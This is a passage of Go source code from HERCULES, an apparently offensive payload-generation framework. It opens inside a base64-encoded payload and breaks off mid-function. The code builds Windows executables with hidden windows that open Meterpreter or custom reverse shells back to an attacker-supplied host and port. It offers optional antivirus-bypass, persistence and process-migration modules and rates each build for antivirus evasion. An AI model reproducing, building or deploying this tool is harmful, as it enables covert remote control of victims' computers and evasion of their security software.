Gxjb2RlW2ldCiAgfQogIC8vUlNFLk1pZ3JhdGUoQWRkciwgbGVuKFNoZWxsY29kZSkpCiAgc3lzY2FsbC5TeXNjYWxsKEFkZHIsIDAsIDAsIDAsIDApCgp9Cg==" 21 | 22 | type PAYLOAD struct { 23 | Ip string 24 | Port string 25 | Type int 26 | Size string 27 | UPX_Size string 28 | MidSize string 29 | FullSize string 30 | Score float32 31 | FileName string 32 | SourceCode string 33 | Persistence bool 34 | Migrate bool 35 | BypassAV bool 36 | UPX bool 37 | 38 | } 39 | 40 | var Payload PAYLOAD 41 | var MenuSelection int 42 | var Ask string 43 | var NO int 44 | 45 | 46 | 47 | func main() { 48 | 49 | Green := color.New(color.FgGreen) 50 | BoldGreen := Green.Add(color.Bold) 51 | Yellow := color.New(color.FgYellow) 52 | BoldYellow := Yellow.Add(color.Bold) 53 | Red := color.New(color.FgRed) 54 | BoldRed := Red.Add(color.Bold) 55 | 56 | 57 | Result := CheckSetup() 58 | 59 | if Result == false { 60 | ClearScreen() 61 | PrintBanner() 62 | PrintCredit() 63 | 64 | BoldRed.Println("\n\n[!] HERCULES is not installed properly, please run setup.sh") 65 | 66 | os.Exit(1) 67 | 68 | } 69 | 70 | ClearScreen() 71 | PrintBanner() 72 | PrintCredit() 73 | Menu_1() 74 | 75 | fmt.Scan(&MenuSelection) 76 | 77 | ClearScreen() 78 | 79 | if MenuSelection == 1 { 80 | PrintBanner() 81 | PrintPayloads() 82 | fmt.Print("\n\n[*] Select : ") 83 | fmt.Scan(&NO) 84 | PreparePayload(NO) 85 | 86 | fmt.Print("\n\n[*] Enter the base name for output files : ") 87 | fmt.Scan(&Payload.FileName) 88 | CompilePayload() 89 | AskUPX() 90 | FinalView() 91 | }else if MenuSelection == 2 { 92 | ClearScreen() 93 | PrintBanner() 94 | PrintCredit() 95 | BoldRed.Println("\n\n[!] Bind payload option will be added at next version...") 96 | time.Sleep(3*time.Second) 97 | main() 98 | }else if MenuSelection == 3 { 99 | ClearScreen() 100 | PrintBanner() 101 | PrintCredit() 102 | fmt.Println("\n\n") 103 | Result := ChecVersion() 104 | if strings.Contains(Result, "[!]") { 105 | BoldRed.Println(Result) 106 | if Result == "[!] New version detected" { 107 | BoldYellow.Print("\nDo you want to upgrade ? (y/n) : ") 108 | fmt.Scan(&Ask) 109 | if Ask == "y" || Ask == "Y" { 110 | Update := exec.Command("sh", "-c", "chmod 777 Update && sudo ./Update") 111 | Update.Stdout = os.Stdout 112 | Update.Stderr = os.Stderr 113 | Update.Start() 114 | }else{ 115 | main() 116 | } 117 | } 118 | }else{ 119 | BoldGreen.Println(Result) 120 | time.Sleep(3*time.Second) 121 | main() 122 | } 123 | }else{ 124 | main() 125 | } 126 | 127 | 128 | } 129 | 130 | func CheckSetup() (bool){ 131 | 132 | DirList, _ := exec.Command("sh", "-c", "cd $HERCULES_PATH/src && ls").Output() 133 | GoVer, _ := exec.Command("sh", "-c", "go version").Output() 134 | UPX, _ := exec.Command("sh", "-c", "upx").Output() 135 | 136 | if (!(strings.Contains(string(DirList), "EGESPLOIT"))) { 137 | return false 138 | } 139 | 140 | if !(strings.Contains(string(GoVer), "version")) { 141 | return false 142 | } 143 | if !(strings.Contains(string(UPX), "Markus")) { 144 | return false 145 | } 146 | return true 147 | } 148 | 149 | 150 | func ChecVersion() (string){ 151 | 152 | Response, Error := http.Get("https://raw.githubusercontent.com/EgeBalci/HERCULES/master/SOURCE/HERCULES.go") 153 | if Error != nil { 154 | return "[!] ERROR : Connection attempt failed" 155 | } 156 | Body, _ := ioutil.ReadAll(Response.Body) 157 | 158 | Version := string(`"`+VERSION+`"`) 159 | 160 | if !(strings.Contains(string(Body), Version)) { 161 | return "[!] New version detected" 162 | }else{ 163 | return "[+] HERCULES is up to date" 164 | } 165 | 166 | } 167 | 168 | 169 | func PrintBanner() { 170 | color.Red(" ██░ ██ ▓█████ ██▀███ ▄████▄ █ ██ ██▓ ▓█████ ██████ ") 171 | color.Red("▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ██ ▓██▒▓██▒ ▓█ ▀ ▒██ ▒ ") 172 | color.Red("▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▓██ ▒██░▒██░ ▒███ ░ ▓██▄ ") 173 | color.Red("░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▓▓█ ░██░▒██░ ▒▓█ ▄ ▒ ██▒") 174 | color.Red("░▓█▒░██▓░▒████▒░██▓ ▒██▒▒ ▓███▀ ░▒▒█████▓ ░██████▒░▒████▒▒██████▒▒") 175 | color.Red(" ▒ ░░▒░▒░░ ▒░ ░░ ▒▓ ░▒▓░░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░") 176 | color.Red(" ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░") 177 | color.Red(" ░ ░░ ░ ░ ░░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ") 178 | color.Red(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ") 179 | color.Red(" ░ ") 180 | 181 | } 182 | 183 | func PrintCredit() { 184 | Green := color.New(color.FgGreen) 185 | BoldGreen := Green.Add(color.Bold) 186 | color.Green("\n+ -- --=[ HERCULES FRAMEWORK ]") 187 | color.Green("+ -- --=[ Version: "+VERSION+" ]") 188 | BoldGreen.Println("+ -- --=[ Ege Balcı ]") 189 | } 190 | 191 | 192 | func Menu_1() { 193 | Yellow := color.New(color.FgYellow) 194 | BoldYellow := Yellow.Add(color.Bold) 195 | White := color.New(color.FgWhite) 196 | UnderlinedWhite := White.Add(color.Underline) 197 | BoldYellow.Println("\n[1] GENERATE PAYLOAD ") 198 | BoldYellow.Println("\n[2] BIND PAYLOAD ") 199 | BoldYellow.Println("\n[3] UPDATE ") 200 | 201 | UnderlinedWhite.Print("\n\n[*] Select : ") 202 | } 203 | 204 | func PrintPayloads() { 205 | 206 | White := color.New(color.FgWhite) 207 | BoldWhite := White.Add(color.Bold) 208 | Green := color.New(color.FgGreen) 209 | BoldGreen := Green.Add(color.Bold) 210 | 211 | 212 | fmt.Println("\n") 213 | BoldWhite.Println(" #===============================================================================#") 214 | BoldWhite.Println(" | PAYLOAD | SIZE/UPX | AV Evasion Score |") 215 | BoldWhite.Println(" |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~|") 216 | BoldWhite.Print("(1) Meterpreter Reverse TCP | 946 KB / 262 KB | ") 217 | BoldGreen.Print(" 8/10 ") 218 | BoldWhite.Println("|") 219 | BoldWhite.Println(" | | | |") 220 | BoldWhite.Print("(2) Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") 221 | BoldGreen.Print(" 8/10 ") 222 | BoldWhite.Println("|") 223 | BoldWhite.Println(" | | | |") 224 | BoldWhite.Print("(3) Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") 225 | BoldGreen.Print(" 8/10 ") 226 | BoldWhite.Println("|") 227 | BoldWhite.Println(" | | | |") 228 | BoldWhite.Print("(4) HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") 229 | BoldGreen.Print("7/10 ") 230 | BoldWhite.Println("|") 231 | BoldWhite.Println(" | | | |") 232 | BoldWhite.Println(" #===============================================================================#") 233 | fmt.Println("\n") 234 | } 235 | 236 | 237 | func FinalView() { 238 | Cyan := color.New(color.FgCyan) 239 | BoldCyan := Cyan.Add(color.Bold) 240 | Green := color.New(color.FgGreen) 241 | BoldGreen := Green.Add(color.Bold) 242 | Blue := color.New(color.FgBlue) 243 | BoldBlue := Blue.Add(color.Bold) 244 | Yellow := color.New(color.FgYellow) 245 | BoldYellow := Yellow.Add(color.Bold) 246 | Red := color.New(color.FgRed) 247 | BoldRed := Red.Add(color.Bold) 248 | White := color.New(color.FgWhite) 249 | BoldWhite := White.Add(color.Bold) 250 | ClearScreen() 251 | PrintBanner() 252 | 253 | if Payload.Type == 1 { 254 | BoldBlue.Println("#====================================================================================#") 255 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 256 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 257 | BoldBlue.Print("# Meterpreter Reverse TCP | 946 KB / 262 KB | ") 258 | if Payload.Score < 5 { 259 | BoldRed.Print(Payload.Score) 260 | }else if Payload.Score == 5 { 261 | BoldYellow.Print(Payload.Score) 262 | }else { 263 | BoldGreen.Print(Payload.Score) 264 | } 265 | if Payload.Score == 10 { 266 | BoldGreen.Print("/10 ") 267 | }else{ 268 | BoldGreen.Print("/10 ") 269 | } 270 | BoldBlue.Println("#") 271 | BoldBlue.Println("#====================================================================================#") 272 | }else if Payload.Type == 2 { 273 | BoldBlue.Println("#====================================================================================#") 274 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 275 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 276 | BoldBlue.Print("# Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") 277 | if Payload.Score < 5 { 278 | BoldRed.Print(Payload.Score) 279 | }else if Payload.Score == 5 { 280 | BoldYellow.Print(Payload.Score) 281 | }else { 282 | BoldGreen.Print(Payload.Score) 283 | } 284 | if Payload.Score == 10 { 285 | BoldGreen.Print("/10 ") 286 | }else{ 287 | BoldGreen.Print("/10 ") 288 | } 289 | BoldBlue.Println("#") 290 | BoldBlue.Println("#====================================================================================#") 291 | }else if Payload.Type == 3 { 292 | BoldBlue.Println("#====================================================================================#") 293 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 294 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 295 | BoldBlue.Print("# Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") 296 | if Payload.Score < 5 { 297 | BoldRed.Print(Payload.Score) 298 | }else if Payload.Score == 5 { 299 | BoldYellow.Print(Payload.Score) 300 | }else { 301 | BoldGreen.Print(Payload.Score) 302 | } 303 | if Payload.Score == 10 { 304 | BoldGreen.Print("/10 ") 305 | }else{ 306 | BoldGreen.Print("/10 ") 307 | } 308 | BoldBlue.Println("#") 309 | BoldBlue.Println("#====================================================================================#") 310 | }else if Payload.Type == 4 { 311 | BoldBlue.Println("#====================================================================================#") 312 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 313 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 314 | BoldBlue.Print("# HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") 315 | if Payload.Score < 5 { 316 | BoldRed.Print(Payload.Score) 317 | }else if Payload.Score == 5 { 318 | BoldYellow.Print(Payload.Score) 319 | }else { 320 | BoldGreen.Print(Payload.Score) 321 | } 322 | if Payload.Score == 10 { 323 | BoldGreen.Print("/10 ") 324 | }else{ 325 | BoldGreen.Print("/10 ") 326 | } 327 | BoldBlue.Println("#") 328 | BoldBlue.Println("#====================================================================================#") 329 | } 330 | 331 | 332 | if Payload.Persistence == true { 333 | BoldCyan.Print("\n[*] Persistence : ON") 334 | BoldWhite.Print(" (") 335 | BoldRed.Print("-2") 336 | BoldWhite.Println(")") 337 | } 338 | if Payload.Migrate == true { 339 | BoldCyan.Print("\n[*] Migration : ON") 340 | BoldWhite.Print(" (") 341 | BoldRed.Print("-1") 342 | BoldWhite.Println(")") 343 | } 344 | 345 | if Payload.UPX == true { 346 | BoldCyan.Print("\n[*] UPX : ON") 347 | BoldWhite.Print(" (") 348 | BoldRed.Print("-3") 349 | BoldWhite.Println(")") 350 | } 351 | 352 | 353 | if Payload.Type == 1 { 354 | if Payload.UPX == true && (Payload.Persistence || Payload.Migrate ){ 355 | BoldCyan.Println("\n[*] Payload Size : 326 KB") 356 | }else if Payload.UPX == true && !(Payload.Persistence || Payload.Migrate) { 357 | BoldCyan.Println("\n[*] Payload Size : 262 KB") 358 | }else if Payload.UPX == false && !(Payload.Persistence || Payload.Migrate ) { 359 | BoldCyan.Println("\n[*] Payload Size : 946 KB") 360 | } 361 | 362 | }else{ 363 | if Payload.UPX == true { 364 | BoldCyan.Println("\n[*] Payload Size : " + Payload.UPX_Size) 365 | }else{ 366 | BoldCyan.Println("\n[*] Payload Size : " + Payload.Size) 367 | } 368 | } 369 | 370 | 371 | PayloadName := strings.TrimSuffix(Payload.FileName, ".go") 372 | 373 | PayloadName += ".exe" 374 | 375 | BoldCyan.Println("\n[*] Payload saved at : /$HOME/" + PayloadName + "\n\n") 376 | 377 | 378 | } 379 | 380 | 381 | func CompilePayload() { 382 | Yellow := color.New(color.FgYellow) 383 | BoldYellow := Yellow.Add(color.Bold) 384 | Red := color.New(color.FgRed) 385 | Warning := Red.Add(color.Bold) 386 | 387 | Payload.FileName += ".go" 388 | 389 | File, _ := os.Create(Payload.FileName) 390 | Source, _ := base64.StdEncoding.DecodeString(Payload.SourceCode) 391 | var SourceCode string 392 | 393 | if Payload.Type == 2 || Payload.Type == 3 { 394 | Address := string("\"http://" + Payload.Ip + ":" + Payload.Port + "/\"") 395 | SourceCode = strings.Replace(string(Source), string("\"http://127.0.0.1:8080/\""), string(Address), -1) 396 | if Payload.BypassAV == true { 397 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) 398 | SourceCode = strings.Replace(string(SourceCode), "//RSE.BypassAV(3)", "RSE.BypassAV(3)", -1) 399 | } 400 | if Payload.Persistence == true { 401 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", `import "EGESPLOIT/RSE"`, -1) 402 | SourceCode = strings.Replace(string(SourceCode), "//RSE.Persistence()", "RSE.Persistence()", -1) 403 | } 404 | if Payload.Migrate == true { 405 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) 406 | SourceCode = strings.Replace(string(SourceCode), "//RSE.Migrate(Addr, len(Shellcode))", "RSE.Migrate(Addr, len(Shellcode))", -1) 407 | } 408 | 409 | 410 | File.WriteString(SourceCode) 411 | 412 | BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) 413 | BoldYellow.Println("\n[*] Compiling payload...") 414 | BoldYellow.Println("\n[*] " + BuildCommand_Args) 415 | BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) 416 | BuildCommand.Stdout = os.Stdout 417 | BuildCommand.Stderr = os.Stderr 418 | BuildCommand.Run() 419 | CleanFilesCommand := string("rm " + Payload.FileName) 420 | exec.Command("sh", "-c", CleanFilesCommand).Run() 421 | DirFiles, _ := exec.Command("sh", "-c", "ls").Output() 422 | FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go") 423 | if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { 424 | Warning.Println("\n[!] ERROR : Compile failed") 425 | os.Exit(1) 426 | } 427 | File.Close() 428 | MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME") 429 | exec.Command("sh", "-c", MovePayload).Run() 430 | 431 | 432 | 433 | 434 | }else if Payload.Type == 1 { 435 | var IP string = "[4]byte{" 436 | IP_Array := strings.Split(string(Payload.Ip), `.`) 437 | for i := 0; i < 4; i++ { 438 | if i == 3 { 439 | IP += (IP_Array[i] + ",") 440 | break 441 | } 442 | IP += (IP_Array[i] + "," + " ") 443 | } 444 | IP += "}}" 445 | 446 | SourceCode = strings.Replace(string(Source), `[4]byte{127,0,0,1}}`, IP, -1) 447 | SourceCode = strings.Replace(string(SourceCode), `5555`, Payload.Port, -1) 448 | if Payload.BypassAV == true { 449 | SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) 450 | SourceCode = strings.Replace(string(SourceCode), "//RSE.BypassAV(3)", "RSE.BypassAV(3)", -1) 451 | } 452 | 453 | if Payload.Persistence == true { 454 | SourceCode = strings.Replace(string(SourceCode), `//import "EGESPLOIT/RSE"`, `import "EGESPLOIT/RSE"`, -1) 455 | SourceCode = strings.Replace(string(SourceCode), `//RSE.Persistence()`, `RSE.Persistence()`, -1) 456 | } 457 | if Payload.Migrate == true { 458 | SourceCode = strings.Replace(string(SourceCode), `//import "EGESPLOIT/RSE"`, `import "EGESPLOIT/RSE"`, -1) 459 | SourceCode = strings.Replace(string(SourceCode), `//RSE.Migrate(Addr, int(Length_int))`, `RSE.Migrate(Addr, int(Length_int))`, -1) 460 | } 461 | 462 | 463 | File.WriteString(SourceCode) 464 | 465 | BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) 466 | BoldYellow.Println("\n[*] Compiling payload...") 467 | BoldYellow.Println("\n[*] " + BuildCommand_Args) 468 | BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) 469 | BuildCommand.Stdout = os.Stdout 470 | BuildCommand.Stderr = os.Stderr 471 | BuildCommand.Run() 472 | CleanFilesCommand := string("rm " + Payload.FileName) 473 | exec.Command("sh", "-c", CleanFilesCommand).Run() 474 | DirFiles, _ := exec.Command("sh", "-c", "ls").Output() 475 | FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go") 476 | if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { 477 | Warning.Println("\n[!] ERROR : Compile failed") 478 | os.Exit(1) 479 | } 480 | File.Close() 481 | MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME") 482 | exec.Command("sh", "-c", MovePayload).Run() 483 | 484 | }else if Payload.Type == 4 { 485 | Payload.Ip = string(`"`+Payload.Ip+`"`) 486 | Payload.Port = string(`"`+Payload.Port+`"`) 487 | SourceCode = strings.Replace(string(Source), `"10.10.10.84"`, Payload.Ip, -1) 488 | SourceCode = strings.Replace(string(SourceCode), `"5555"`, Payload.Port, -1) 489 | 490 | File.WriteString(SourceCode) 491 | 492 | BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) 493 | BoldYellow.Println("\n[*] Compiling payload...") 494 | BoldYellow.Println("\n[*] " + BuildCommand_Args) 495 | BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) 496 | BuildCommand.Stdout = os.Stdout 497 | BuildCommand.Stderr = os.Stderr 498 | BuildCommand.Run() 499 | CleanFilesCommand := string("rm " + Payload.FileName) 500 | exec.Command("sh", "-c", CleanFilesCommand).Run() 501 | DirFiles, _ := exec.Command("sh", "-c", "ls").Output() 502 | FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go") 503 | if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { 504 | Warning.Println("\n[!] ERROR : Compile failed") 505 | os.Exit(1) 506 | } 507 | File.Close() 508 | MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME") 509 | exec.Command("sh", "-c", MovePayload).Run() 510 | 511 | } 512 | 513 | } 514 | 515 | func AskMigrate() { 516 | Red := color.New(color.FgRed) 517 | Warning := Red.Add(color.Bold) 518 | Yellow := color.New(color.FgYellow) 519 | BoldYellow := Yellow.Add(color.Bold) 520 | BoldYellow.Print("\n[?] ") 521 | fmt.Print("Do you want to add migration function to payload (y/n) :") 522 | fmt.Scan(&Ask) 523 | if Ask == "y" || Ask == "Y" { 524 | Warning.Print("\n[!] Adding migration will decreases the AV Evasion Score and increase the paylaod size, do you still want to continue (Y/n) :") 525 | fmt.Scan(&Ask) 526 | if Ask == "y" || Ask == "Y"{ 527 | Payload.Migrate = true 528 | Payload.Score = (Payload.Score - 1) 529 | }else{ 530 | Payload.Migrate = false 531 | } 532 | }else{ 533 | Payload.Migrate = false 534 | } 535 | } 536 | 537 | 538 | 539 | 540 | func AskPersistence() { 541 | Red := color.New(color.FgRed) 542 | Warning := Red.Add(color.Bold) 543 | Yellow := color.New(color.FgYellow) 544 | BoldYellow := Yellow.Add(color.Bold) 545 | BoldYellow.Print("\n[?] ") 546 | fmt.Print("Do you want to add persistence function to payload (y/n) :") 547 | fmt.Scan(&Ask) 548 | if Ask == "y" || Ask == "Y" { 549 | Warning.Print("\n[!] Adding persistence will decreases the AV Evasion Score and increase the paylaod size, do you still want to continue (Y/n) :") 550 | fmt.Scan(&Ask) 551 | if Ask == "y" || Ask == "Y"{ 552 | Payload.Persistence = true 553 | Payload.Score = (Payload.Score - 2) 554 | }else{ 555 | Payload.Persistence = false 556 | } 557 | }else{ 558 | Payload.Persistence = false 559 | } 560 | } 561 | 562 | func AskBypassAV() { 563 | Red := color.New(color.FgRed) 564 | Warning := Red.Add(color.Bold) 565 | Yellow := color.New(color.FgYellow) 566 | BoldYellow := Yellow.Add(color.Bold) 567 | BoldYellow.Print("\n[?] ") 568 | fmt.Print("Do you want to add Bypass AV function to payload (y/n) :") 569 | fmt.Scan(&Ask) 570 | if Ask == "y" || Ask == "Y" { 571 | Warning.Print("\n[!] Adding Bypass AV will increase the paylaod size, do you still want to continue (Y/n) :") 572 | fmt.Scan(&Ask) 573 | if Ask == "y" || Ask == "Y"{ 574 | Payload.BypassAV = true 575 | Payload.Score = (Payload.Score + 2) 576 | }else{ 577 | Payload.BypassAV = false 578 | } 579 | }else{ 580 | Payload.BypassAV = false 581 | } 582 | } 583 | 584 | 585 | 586 | 587 | func AskUPX() { 588 | Red := color.New(color.FgRed) 589 | Warning := Red.Add(color.Bold) 590 | Yellow := color.New(color.FgYellow) 591 | BoldYellow := Yellow.Add(color.Bold) 592 | BoldYellow.Print("\n[?] ") 593 | fmt.Print("Do you want to compress the payload with UPX (y/n) :") 594 | fmt.Scan(&Ask) 595 | if Ask == "y" || Ask == "Y" { 596 | Warning.Print("\n[!] Compressing payloads with UPX decreases the AV Evasion Score, do you still want to continue (Y/n) :") 597 | fmt.Scan(&Ask) 598 | if Ask == "y" || Ask == "Y"{ 599 | Payload.UPX = true 600 | Payload.Score = (Payload.Score - 3) 601 | ClearScreen() 602 | PrintBanner() 603 | 604 | ExeName := strings.TrimSuffix(Payload.FileName, ".go") 605 | ExeName += ".exe" 606 | UPX_Command := string("upx --brute " + ExeName) 607 | UPX := exec.Command("sh", "-c", UPX_Command) 608 | UPX.Stdout = os.Stdout 609 | UPX.Run() 610 | }else{ 611 | Payload.UPX = false 612 | } 613 | }else{ 614 | Payload.UPX = false 615 | } 616 | } 617 | 618 | 619 | func ClearScreen() { 620 | Clear := exec.Command("clear") 621 | Clear.Stdout = os.Stdout 622 | Clear.Run() 623 | } 624 | 625 | 626 | 627 | 628 | 629 | 630 | 631 | func PreparePayload(No int) { 632 | 633 | Blue := color.New(color.FgBlue) 634 | BoldBlue := Blue.Add(color.Bold) 635 | Green := color.New(color.FgGreen) 636 | BoldGreen := Green.Add(color.Bold) 637 | Red := color.New(color.FgRed) 638 | Warning := Red.Add(color.Bold) 639 | 640 | 641 | if No == 1 { 642 | Payload.Type = 1 643 | Payload.Size = "946 KB" 644 | Payload.FullSize = "1.1 MB" 645 | Payload.MidSize = "326 KB" 646 | Payload.UPX_Size = "262 KB" 647 | Payload.Score = 8 648 | Payload.SourceCode = METERPRETER_TCP 649 | 650 | ClearScreen() 651 | PrintBanner() 652 | 653 | BoldBlue.Println("#====================================================================================#") 654 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 655 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 656 | BoldBlue.Print("# Meterpreter Reverse TCP | 946 KB / 262 KB | ") 657 | BoldGreen.Print(" 8/10 ") 658 | BoldBlue.Println("#") 659 | BoldBlue.Println("#====================================================================================#") 660 | 661 | for ;; { 662 | var IP string 663 | fmt.Print("\n\n[*] Enter LHOST : ") 664 | fmt.Scan(&IP) 665 | if (len(IP) < 7) || (len(IP) > 15) { 666 | Warning.Println("\n\n[!] ERROR : Invalid ip") 667 | }else{ 668 | Payload.Ip = IP 669 | break 670 | } 671 | 672 | } 673 | 674 | for ;; { 675 | var PORT string 676 | fmt.Print("\n[*] Enter LPORT : ") 677 | fmt.Scan(&PORT) 678 | _, err := strconv.Atoi(PORT) 679 | if err == nil { 680 | Payload.Port = PORT 681 | break 682 | } 683 | Warning.Println("\n\n[!] ERROR : Invalid port") 684 | 685 | } 686 | AskPersistence() 687 | AskMigrate() 688 | AskBypassAV() 689 | 690 | 691 | }else if No == 2 { 692 | 693 | Payload.Type = 2 694 | Payload.Size = "4.2 MB" 695 | Payload.UPX_Size = "1.1 KB" 696 | Payload.Score = 8 697 | Payload.SourceCode = METERPRETER_HTTP_HTTPS 698 | 699 | ClearScreen() 700 | PrintBanner() 701 | 702 | BoldBlue.Println("#====================================================================================#") 703 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 704 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 705 | BoldBlue.Print("# Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") 706 | BoldGreen.Print(" 8/10 ") 707 | BoldBlue.Println("#") 708 | BoldBlue.Println("#====================================================================================#") 709 | 710 | for ;; { 711 | var IP string 712 | fmt.Print("\n\n[*] Enter LHOST : ") 713 | fmt.Scan(&IP) 714 | if (len(IP) < 7) || (len(IP) > 15) { 715 | Warning.Println("\n\n[!] ERROR : Invalid ip") 716 | }else{ 717 | Payload.Ip = IP 718 | break 719 | } 720 | 721 | } 722 | 723 | for ;; { 724 | var PORT string 725 | fmt.Print("\n[*] Enter LPORT : ") 726 | fmt.Scan(&PORT) 727 | _, err := strconv.Atoi(PORT) 728 | if err == nil { 729 | Payload.Port = PORT 730 | break 731 | } 732 | Warning.Println("\n\n[!] ERROR : Invalid port") 733 | 734 | } 735 | 736 | 737 | AskPersistence() 738 | AskMigrate() 739 | 740 | 741 | }else if No == 3 { 742 | Payload.Type = 3 743 | Payload.Size = "4.2 MB" 744 | Payload.Score = 8 745 | Payload.SourceCode = METERPRETER_HTTP_HTTPS 746 | 747 | ClearScreen() 748 | PrintBanner() 749 | 750 | BoldBlue.Println("#====================================================================================#") 751 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 752 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 753 | BoldBlue.Print("# Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") 754 | BoldGreen.Print(" 8/10 ") 755 | BoldBlue.Println("#") 756 | BoldBlue.Println("#====================================================================================#") 757 | 758 | for ;; { 759 | var IP string 760 | fmt.Print("\n\n[*] Enter LHOST : ") 761 | fmt.Scan(&IP) 762 | if (len(IP) < 7) || (len(IP) > 15) { 763 | Warning.Println("\n\n[!] ERROR : Invalid ip") 764 | }else{ 765 | Payload.Ip = IP 766 | break 767 | } 768 | 769 | } 770 | 771 | for ;; { 772 | var PORT string 773 | fmt.Print("\n[*] Enter LPORT : ") 774 | fmt.Scan(&PORT) 775 | _, err := strconv.Atoi(PORT) 776 | if err == nil { 777 | Payload.Port = PORT 778 | break 779 | } 780 | Warning.Println("\n\n[!] ERROR : Invalid port") 781 | 782 | } 783 | 784 | AskPersistence() 785 | AskMigrate() 786 | 787 | 788 | 789 | }else if No == 4 { 790 | Payload.Type = 4 791 | Payload.Size = "4.4 MB" 792 | Payload.Score = 9 793 | Payload.SourceCode = HERCULES_REVERSE_SHELL 794 | 795 | ClearScreen() 796 | PrintBanner() 797 | 798 | BoldBlue.Println("#====================================================================================#") 799 | BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") 800 | BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") 801 | BoldBlue.Print("# HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") 802 | BoldGreen.Print("7/10 ") 803 | BoldBlue.Println("#") 804 | BoldBlue.Println("#====================================================================================#") 805 | 806 | for ;; { 807 | var IP string 808 | fmt.Print("\n\n[*] Enter LHOST : ") 809 | fmt.Scan(&IP) 810 | if (len(IP) < 7) || (len(IP) > 15) { 811 | Warning.Println("\n\n[!] ERROR : Invalid ip") 812 | }else{ 813 | Payload.Ip = IP 814 | break 815 | } 816 | 817 | } 818 | 819 | for ;; { 820 | var PORT string 821 | fmt.Print("\n[*] Enter LPORT : ") 822 | fmt.Scan(&PORT) 823 | _, err := strconv.Atoi(PORT) 824 | if err == 